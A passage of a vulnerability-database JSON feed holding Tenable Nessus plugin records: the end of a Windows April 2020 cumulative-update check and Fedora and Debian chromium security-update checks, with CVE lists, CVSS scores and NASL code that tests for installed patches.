Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n handle objects in memory. An attacker who successfully\n exploited these vulnerabilities could gain elevated\n privileges on a target operating system. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, this vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerabilities by correcting how Windows Hyper-V\n handles objects in memory. (CVE-2020-0917,\n CVE-2020-0918)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969, \n CVE-2020-0970)\");\n # https://support.microsoft.com/en-us/help/4549951/windows-10-update-kb4549951\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?084a5389\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4549951.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4549951');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4549951])\n ||\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18363\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4549951])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:08:18", "description": "Update to 80.0.3987.132. Lots of security fixes here. VAAPI re-enabled by default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-20T00:00:00", "type": "nessus", "title": "Fedora 31 : chromium (2020-f6271d7afa)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20446", "CVE-2020-10531", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6417", "CVE-2020-6418", "CVE-2020-6420"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2020-F6271D7AFA.NASL", "href": "https://www.tenable.com/plugins/nessus/134718", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-f6271d7afa.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134718);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-20446\", \"CVE-2020-10531\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6383\", \"CVE-2020-6384\", \"CVE-2020-6385\", \"CVE-2020-6386\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6405\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6417\", \"CVE-2020-6418\", \"CVE-2020-6420\");\n script_xref(name:\"FEDORA\", value:\"2020-f6271d7afa\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Fedora 31 : chromium (2020-f6271d7afa)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 80.0.3987.132. Lots of security fixes here. VAAPI re-enabled\nby default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-f6271d7afa\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"chromium-80.0.3987.132-1.fc31\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:08:19", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2019-19880 Richard Lorenz discovered an issue in the sqlite library.\n\n - CVE-2019-19923 Richard Lorenz discovered an out-of-bounds read issue in the sqlite library.\n\n - CVE-2019-19925 Richard Lorenz discovered an issue in the sqlite library.\n\n - CVE-2019-19926 Richard Lorenz discovered an implementation error in the sqlite library.\n\n - CVE-2020-6381 UK's National Cyber Security Centre discovered an integer overflow issue in the v8 JavaScript library.\n\n - CVE-2020-6382 Soyeon Park and Wen Xu discovered a type error in the v8 JavaScript library.\n\n - CVE-2020-6383 Sergei Glazunov discovered a type error in the v8 JavaScript library.\n\n - CVE-2020-6384 David Manoucheri discovered a use-after-free issue in WebAudio.\n\n - CVE-2020-6385 Sergei Glazunov discovered a policy enforcement error.\n\n - CVE-2020-6386 Zhe Jin discovered a use-after-free issue in speech processing.\n\n - CVE-2020-6387 Natalie Silvanovich discovered an out-of-bounds write error in the WebRTC implementation.\n\n - CVE-2020-6388 Sergei Glazunov discovered an out-of-bounds read error in the WebRTC implementation.\n\n - CVE-2020-6389 Natalie Silvanovich discovered an out-of-bounds write error in the WebRTC implementation.\n\n - CVE-2020-6390 Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6391 Michal Bentkowski discoverd that untrusted input was insufficiently validated.\n\n - CVE-2020-6392 The Microsoft Edge Team discovered a policy enforcement error.\n\n - CVE-2020-6393 Mark Amery discovered a policy enforcement error.\n\n - CVE-2020-6394 Phil Freo discovered a policy enforcement error.\n\n - CVE-2020-6395 Pierre Langlois discovered an out-of-bounds read error in the v8 JavaScript library.\n\n - CVE-2020-6396 William Luc Ritchie discovered an error in the skia library.\n\n - CVE-2020-6397 Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6398 pdknsk discovered an uninitialized variable in the pdfium library.\n\n - CVE-2020-6399 Luan Herrera discovered a policy enforcement error.\n\n - CVE-2020-6400 Takashi Yoneuchi discovered an error in Cross-Origin Resource Sharing.\n\n - CVE-2020-6401 Tzachy Horesh discovered that user input was insufficiently validated.\n\n - CVE-2020-6402 Vladimir Metnew discovered a policy enforcement error.\n\n - CVE-2020-6403 Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6404 kanchi discovered an error in Blink/Webkit.\n\n - CVE-2020-6405 Yongheng Chen and Rui Zhong discovered an out-of-bounds read issue in the sqlite library.\n\n - CVE-2020-6406 Sergei Glazunov discovered a use-after-free issue.\n\n - CVE-2020-6407 Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6408 Zhong Zhaochen discovered a policy enforcement error in Cross-Origin Resource Sharing.\n\n - CVE-2020-6409 Divagar S and Bharathi V discovered an error in the omnibox implementation.\n\n - CVE-2020-6410 evil1m0 discovered a policy enforcement error.\n\n - CVE-2020-6411 Khalil Zhani discovered that user input was insufficiently validated.\n\n - CVE-2020-6412 Zihan Zheng discovered that user input was insufficiently validated.\n\n - CVE-2020-6413 Michal Bentkowski discovered an error in Blink/Webkit.\n\n - CVE-2020-6414 Lijo A.T discovered a policy safe browsing policy enforcement error.\n\n - CVE-2020-6415 Avihay Cohen discovered an implementation error in the v8 JavaScript library.\n\n - CVE-2020-6416 Woojin Oh discovered that untrusted input was insufficiently validated.\n\n - CVE-2020-6418 Clement Lecigne discovered a type error in the v8 JavaScript library.\n\n - CVE-2020-6420 Taras Uzdenov discovered a policy enforcement error.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-12T00:00:00", "type": "nessus", "title": "Debian DSA-4638-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19880", "CVE-2019-19923", "CVE-2019-19925", "CVE-2019-19926", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6418", "CVE-2020-6420"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4638.NASL", "href": "https://www.tenable.com/plugins/nessus/134433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4638. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134433);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2019-19880\", \"CVE-2019-19923\", \"CVE-2019-19925\", \"CVE-2019-19926\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6383\", \"CVE-2020-6384\", \"CVE-2020-6385\", \"CVE-2020-6386\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6405\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6418\", \"CVE-2020-6420\");\n script_xref(name:\"DSA\", value:\"4638\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Debian DSA-4638-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2019-19880\n Richard Lorenz discovered an issue in the sqlite\n library.\n\n - CVE-2019-19923\n Richard Lorenz discovered an out-of-bounds read issue in\n the sqlite library.\n\n - CVE-2019-19925\n Richard Lorenz discovered an issue in the sqlite\n library.\n\n - CVE-2019-19926\n Richard Lorenz discovered an implementation error in the\n sqlite library.\n\n - CVE-2020-6381\n UK's National Cyber Security Centre discovered an\n integer overflow issue in the v8 JavaScript library.\n\n - CVE-2020-6382\n Soyeon Park and Wen Xu discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6383\n Sergei Glazunov discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6384\n David Manoucheri discovered a use-after-free issue in\n WebAudio.\n\n - CVE-2020-6385\n Sergei Glazunov discovered a policy enforcement error.\n\n - CVE-2020-6386\n Zhe Jin discovered a use-after-free issue in speech\n processing.\n\n - CVE-2020-6387\n Natalie Silvanovich discovered an out-of-bounds write\n error in the WebRTC implementation.\n\n - CVE-2020-6388\n Sergei Glazunov discovered an out-of-bounds read error\n in the WebRTC implementation.\n\n - CVE-2020-6389\n Natalie Silvanovich discovered an out-of-bounds write\n error in the WebRTC implementation.\n\n - CVE-2020-6390\n Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6391\n Michal Bentkowski discoverd that untrusted input was\n insufficiently validated.\n\n - CVE-2020-6392\n The Microsoft Edge Team discovered a policy enforcement\n error.\n\n - CVE-2020-6393\n Mark Amery discovered a policy enforcement error.\n\n - CVE-2020-6394\n Phil Freo discovered a policy enforcement error.\n\n - CVE-2020-6395\n Pierre Langlois discovered an out-of-bounds read error\n in the v8 JavaScript library.\n\n - CVE-2020-6396\n William Luc Ritchie discovered an error in the skia\n library.\n\n - CVE-2020-6397\n Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6398\n pdknsk discovered an uninitialized variable in the\n pdfium library.\n\n - CVE-2020-6399\n Luan Herrera discovered a policy enforcement error.\n\n - CVE-2020-6400\n Takashi Yoneuchi discovered an error in Cross-Origin\n Resource Sharing.\n\n - CVE-2020-6401\n Tzachy Horesh discovered that user input was\n insufficiently validated.\n\n - CVE-2020-6402\n Vladimir Metnew discovered a policy enforcement error.\n\n - CVE-2020-6403\n Khalil Zhani discovered a user interface error.\n\n - CVE-2020-6404\n kanchi discovered an error in Blink/Webkit.\n\n - CVE-2020-6405\n Yongheng Chen and Rui Zhong discovered an out-of-bounds\n read issue in the sqlite library.\n\n - CVE-2020-6406\n Sergei Glazunov discovered a use-after-free issue.\n\n - CVE-2020-6407\n Sergei Glazunov discovered an out-of-bounds read error.\n\n - CVE-2020-6408\n Zhong Zhaochen discovered a policy enforcement error in\n Cross-Origin Resource Sharing.\n\n - CVE-2020-6409\n Divagar S and Bharathi V discovered an error in the\n omnibox implementation.\n\n - CVE-2020-6410\n evil1m0 discovered a policy enforcement error.\n\n - CVE-2020-6411\n Khalil Zhani discovered that user input was\n insufficiently validated.\n\n - CVE-2020-6412\n Zihan Zheng discovered that user input was\n insufficiently validated.\n\n - CVE-2020-6413\n Michal Bentkowski discovered an error in Blink/Webkit.\n\n - 